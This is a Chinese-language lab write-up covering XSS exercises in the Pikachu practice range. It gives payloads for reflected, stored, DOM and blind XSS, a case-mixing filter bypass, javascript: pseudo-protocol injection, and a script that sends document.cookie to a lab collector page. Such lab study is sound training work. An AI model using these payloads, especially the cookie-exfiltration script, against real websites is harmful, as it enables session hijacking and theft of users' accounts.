靶场pikachu系列(XSS)

本文深入探讨XSS(跨站脚本)攻击的各种类型,包括反射型、存储型和DOM型,详细解析攻击手法如利用payload注入恶意脚本,绕过过滤机制,以及如何通过JavaScript伪协议实现攻击。同时,文章提供了实例演示,如使用payload获取cookie并发送至后台。
摘要由CSDN通过智能技术生成

XSS

反射型get
审查元素修改maxlength,payload:<script>alert("a");</script>
在这里插入图片描述
post
登陆后payload:<script>alert("a");</script>
在这里插入图片描述
利用bp
在这里插入图片描述
存储型
payload:<script>alert(document.cookie);</script>
在这里插入图片描述
在这里插入图片描述
DOM型
伪协议payload:javascript:alert(/a/)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
盲打:将信息提交到后台
在这里插入图片描述
/pikachu/vul/xss/xssblind/admin_login.php页面登录后弹框
在这里插入图片描述
过滤:测试过滤
在这里插入图片描述
过滤了<script
在这里插入图片描述
过滤了</script
在这里插入图片描述
大小写绕过

payload:<scRipt>alert("a");</ScriPt>

在这里插入图片描述
成功弹出
在这里插入图片描述
htmlspecialchars:默认把预定义的字符 “<” (小于)和 “>” (大于)转换为 HTML 实体
在这里插入图片描述
利用JavaScript伪协议
在这里插入图片描述
href输出:伪协议
在这里插入图片描述
js输出:输入被动态的生成到了javascript中
先闭合<script>标签
payload:</script><script>alert("a");</script>
在这里插入图片描述
在这里插入图片描述
XSS后台
获取cookie
将获得的cookie发至后台

<script>document.location = 'http://192.168.238.131/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

在这里插入图片描述
在这里插入图片描述
cript

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值